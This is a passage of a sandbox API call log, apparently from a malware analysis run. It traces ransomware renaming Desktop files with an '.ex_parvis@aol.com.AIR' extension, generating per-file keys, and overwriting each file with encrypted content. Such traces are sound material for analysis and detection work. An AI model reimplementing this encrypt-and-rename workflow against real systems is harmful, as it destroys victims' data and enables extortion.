	[0099.768] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\giNQiFO2yu.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ginqifo2yu.mp4"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\giNQiFO2yu.mp4.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ginqifo2yu.mp4.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.770] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\giNQiFO2yu.mp4.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ginqifo2yu.mp4.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.770] GetProcessHeap () returned 0x540000
	[0099.770] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x59d258 | out: hHeap=0x540000) returned 1
	[0099.770] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=91791) returned 1
	[0099.770] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1668f
	[0099.770] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.770] GetProcessHeap () returned 0x540000
	[0099.770] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.770] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.771] WriteFile (in: hFile=0x384, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.771] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.771] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.771] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1668f) returned 0x5ffbb8
	[0099.771] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1668f) returned 0x3790048
	[0099.772] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.772] ReadFile (in: hFile=0x384, lpBuffer=0x5ffbb8, nNumberOfBytesToRead=0x1668f, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffbb8*, lpNumberOfBytesRead=0x3a1f778*=0x1668f, lpOverlapped=0x0) returned 1
	[0099.774] SetFilePointer (in: hFile=0x384, lDistanceToMove=-91791, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.774] WriteFile (in: hFile=0x384, lpBuffer=0x3790048*, nNumberOfBytesToWrite=0x1668f, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790048*, lpNumberOfBytesWritten=0x3a1f778*=0x1668f, lpOverlapped=0x0) returned 1
	[0099.774] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.774] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.774] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GaWza31SXv7X.doc", dwFileAttributes=0x80) returned 1
	[0099.775] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GaWza31SXv7X.doc") returned 55
	[0099.775] GetProcessHeap () returned 0x540000
	[0099.775] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd4) returned 0x57fba0
	[0099.775] lstrcpyW (in: lpString1=0x57fba0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GaWza31SXv7X.doc" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GaWza31SXv7X.doc") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GaWza31SXv7X.doc"
	[0099.775] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GaWza31SXv7X.doc", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GaWza31SXv7X.doc.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GaWza31SXv7X.doc.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.775] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GaWza31SXv7X.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gawza31sxv7x.doc"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GaWza31SXv7X.doc.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gawza31sxv7x.doc.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.779] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GaWza31SXv7X.doc.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gawza31sxv7x.doc.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.779] GetProcessHeap () returned 0x540000
	[0099.779] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fba0 | out: hHeap=0x540000) returned 1
	[0099.779] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=30389) returned 1
	[0099.779] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x76b5
	[0099.779] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.779] GetProcessHeap () returned 0x540000
	[0099.779] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.779] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.779] WriteFile (in: hFile=0x384, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.780] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.780] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.780] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x76b5) returned 0x5ffbb8
	[0099.780] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x76b5) returned 0x607278
	[0099.780] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.780] ReadFile (in: hFile=0x384, lpBuffer=0x5ffbb8, nNumberOfBytesToRead=0x76b5, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffbb8*, lpNumberOfBytesRead=0x3a1f778*=0x76b5, lpOverlapped=0x0) returned 1
	[0099.781] SetFilePointer (in: hFile=0x384, lDistanceToMove=-30389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.781] WriteFile (in: hFile=0x384, lpBuffer=0x607278*, nNumberOfBytesToWrite=0x76b5, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x607278*, lpNumberOfBytesWritten=0x3a1f778*=0x76b5, lpOverlapped=0x0) returned 1
	[0099.783] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.783] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.783] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Fx2qp9VfVfnX5d-CiwFc.gif", dwFileAttributes=0x80) returned 1
	[0099.783] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Fx2qp9VfVfnX5d-CiwFc.gif") returned 63
	[0099.783] GetProcessHeap () returned 0x540000
	[0099.783] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe4) returned 0x57fb28
	[0099.783] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Fx2qp9VfVfnX5d-CiwFc.gif" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Fx2qp9VfVfnX5d-CiwFc.gif") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Fx2qp9VfVfnX5d-CiwFc.gif"
	[0099.783] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Fx2qp9VfVfnX5d-CiwFc.gif", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Fx2qp9VfVfnX5d-CiwFc.gif.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Fx2qp9VfVfnX5d-CiwFc.gif.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.783] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Fx2qp9VfVfnX5d-CiwFc.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fx2qp9vfvfnx5d-ciwfc.gif"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Fx2qp9VfVfnX5d-CiwFc.gif.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fx2qp9vfvfnx5d-ciwfc.gif.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.786] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Fx2qp9VfVfnX5d-CiwFc.gif.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fx2qp9vfvfnx5d-ciwfc.gif.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.786] GetProcessHeap () returned 0x540000
	[0099.786] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0099.786] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=17916) returned 1
	[0099.786] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x45fc
	[0099.786] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.786] GetProcessHeap () returned 0x540000
	[0099.786] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.786] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.786] WriteFile (in: hFile=0x384, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.787] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.787] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.787] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x45fc) returned 0x5ffbb8
	[0099.787] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x45fc) returned 0x6041c0
	[0099.787] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.787] ReadFile (in: hFile=0x384, lpBuffer=0x5ffbb8, nNumberOfBytesToRead=0x45fc, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffbb8*, lpNumberOfBytesRead=0x3a1f778*=0x45fc, lpOverlapped=0x0) returned 1
	[0099.788] SetFilePointer (in: hFile=0x384, lDistanceToMove=-17916, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.788] WriteFile (in: hFile=0x384, lpBuffer=0x6041c0*, nNumberOfBytesToWrite=0x45fc, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x6041c0*, lpNumberOfBytesWritten=0x3a1f778*=0x45fc, lpOverlapped=0x0) returned 1
	[0099.789] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.789] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.789] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FEhHTJ Mn0_pPid34.swf", dwFileAttributes=0x80) returned 1
	[0099.789] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FEhHTJ Mn0_pPid34.swf") returned 60
	[0099.789] GetProcessHeap () returned 0x540000
	[0099.789] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xde) returned 0x57fb28
	[0099.789] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FEhHTJ Mn0_pPid34.swf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FEhHTJ Mn0_pPid34.swf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FEhHTJ Mn0_pPid34.swf"
	[0099.789] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FEhHTJ Mn0_pPid34.swf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FEhHTJ Mn0_pPid34.swf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FEhHTJ Mn0_pPid34.swf.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.789] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FEhHTJ Mn0_pPid34.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fehhtj mn0_ppid34.swf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FEhHTJ Mn0_pPid34.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fehhtj mn0_ppid34.swf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.791] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FEhHTJ Mn0_pPid34.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fehhtj mn0_ppid34.swf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.791] GetProcessHeap () returned 0x540000
	[0099.791] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0099.791] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=28848) returned 1
	[0099.791] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x70b0
	[0099.791] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.791] GetProcessHeap () returned 0x540000
	[0099.791] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.791] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.792] WriteFile (in: hFile=0x384, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.792] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.792] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.793] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x70b0) returned 0x5ffbb8
	[0099.793] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x70b0) returned 0x606c70
	[0099.793] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.793] ReadFile (in: hFile=0x384, lpBuffer=0x5ffbb8, nNumberOfBytesToRead=0x70b0, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffbb8*, lpNumberOfBytesRead=0x3a1f778*=0x70b0, lpOverlapped=0x0) returned 1
	[0099.793] SetFilePointer (in: hFile=0x384, lDistanceToMove=-28848, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.793] WriteFile (in: hFile=0x384, lpBuffer=0x606c70*, nNumberOfBytesToWrite=0x70b0, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x606c70*, lpNumberOfBytesWritten=0x3a1f778*=0x70b0, lpOverlapped=0x0) returned 1
	[0099.794] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.794] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.794] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eP3CKlE Jn1WX_Ix8H80.jpg", dwFileAttributes=0x80) returned 1
	[0099.794] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eP3CKlE Jn1WX_Ix8H80.jpg") returned 63
	[0099.794] GetProcessHeap () returned 0x540000
	[0099.794] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe4) returned 0x57fb28
	[0099.794] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eP3CKlE Jn1WX_Ix8H80.jpg" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eP3CKlE Jn1WX_Ix8H80.jpg") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eP3CKlE Jn1WX_Ix8H80.jpg"
	[0099.794] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eP3CKlE Jn1WX_Ix8H80.jpg", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eP3CKlE Jn1WX_Ix8H80.jpg.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eP3CKlE Jn1WX_Ix8H80.jpg.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.794] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eP3CKlE Jn1WX_Ix8H80.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ep3ckle jn1wx_ix8h80.jpg"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eP3CKlE Jn1WX_Ix8H80.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ep3ckle jn1wx_ix8h80.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.797] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eP3CKlE Jn1WX_Ix8H80.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ep3ckle jn1wx_ix8h80.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.797] GetProcessHeap () returned 0x540000
	[0099.797] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0099.797] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=87872) returned 1
	[0099.797] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x15740
	[0099.797] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.797] GetProcessHeap () returned 0x540000
	[0099.797] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.797] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.797] WriteFile (in: hFile=0x384, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.798] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.798] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.798] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x15740) returned 0x5ffbb8
	[0099.798] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x15740) returned 0x3790048
	[0099.799] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.799] ReadFile (in: hFile=0x384, lpBuffer=0x5ffbb8, nNumberOfBytesToRead=0x15740, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffbb8*, lpNumberOfBytesRead=0x3a1f778*=0x15740, lpOverlapped=0x0) returned 1
	[0099.801] SetFilePointer (in: hFile=0x384, lDistanceToMove=-87872, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.801] WriteFile (in: hFile=0x384, lpBuffer=0x3790048*, nNumberOfBytesToWrite=0x15740, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790048*, lpNumberOfBytesWritten=0x3a1f778*=0x15740, lpOverlapped=0x0) returned 1
